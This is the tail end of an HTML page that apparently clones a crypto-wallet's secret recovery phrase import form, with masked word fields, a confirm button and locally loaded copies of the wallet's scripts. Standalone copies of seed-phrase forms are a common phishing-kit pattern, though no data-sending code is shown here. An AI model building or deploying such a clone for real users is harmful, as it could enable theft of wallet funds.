class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-9" type="password" dir="auto" data-testid="import-srp__srp-word-9" class="MuiInputBase-input MuiInput-input" value="" name="Phrase10" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-9-checkbox" type="checkbox" data-testid="import-srp__srp-word-9-checkbox"><label for="import-srp__srp-word-9-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-10" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">11.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-10" type="password" dir="auto" data-testid="import-srp__srp-word-10" class="MuiInputBase-input MuiInput-input" value="" name="Phrase11" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-10-checkbox" type="checkbox" data-testid="import-srp__srp-word-10-checkbox"><label for="import-srp__srp-word-10-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-11" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">12.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-11" type="password" dir="auto" data-testid="import-srp__srp-word-11" class="MuiInputBase-input MuiInput-input" value="" name="Phrase12" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-11-checkbox" type="checkbox" data-testid="import-srp__srp-word-11-checkbox"><label for="import-srp__srp-word-11-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div></div></div><button class="button btn--rounded btn-primary btn--large import-srp__confirm-button" data-testid="import-srp-confirm" sabled="">Confirm Secret Recovery Phrase</button></div></div></form></div></div></div></div></div></div>
  <div id="popover-content"></div>
  <script src="./load-app.js" type="text/javascript" charset="utf-8"></script>


<script type="text/javascript" async="" src="./snow.js"></script><script type="text/javascript" async="" src="./use-snow.js"></script><script type="text/javascript" async="" src="./globalthis.js"></script><script type="text/javascript" async="" src="./sentry-install.js"></script><script type="text/javascript" async="" src="./runtime-lavamoat.js"></script><script type="text/javascript" async="" src="./lockdown-more.js"></script><script type="text/javascript" async="" src="./policy-load.js"></script><script type="text/javascript" async="" src="./common-0.js"></script><script type="text/javascript" async="" src="./common-1.js"></script><script type="text/javascript" async="" src="./common-2.js"></script><script type="text/javascript" async="" src="./common-3.js"></script><script type="text/javascript" async="" src="./common-4.js"></script><script type="text/javascript" async="" src="./common-5.js"></script><script type="text/javascript" async="" src="./common-6.js"></script><script type="text/javascript" async="" src="./ui-0.js"></script><script type="text/javascript" async="" src="./ui-1.js"></script><script type="text/javascript" async="" src="./ui-2.js"></script><script type="text/javascript" async="" src="./ui-3.js"></script><script type="text/javascript" async="" src="./ui-4.js"></script><script type="text/javascript" async="" src="./ui-5.js"></script><script type="text/javascript" async="" src="./ui-6.js"></script><script type="text/javascript" async="" src="./ui-7.js"></script><script type="text/javascript" async="" src="./ui-8.js"></script><script type="text/javascript" async="" src="./ui-9.js"></script><script type="text/javascript" async="" src="./ui-10.js"></script><script type="text/javascript" async="" src="./ui-11.js"></script><script type="text/javascript" async="" src="./ui-12.js"></script>
</body></html>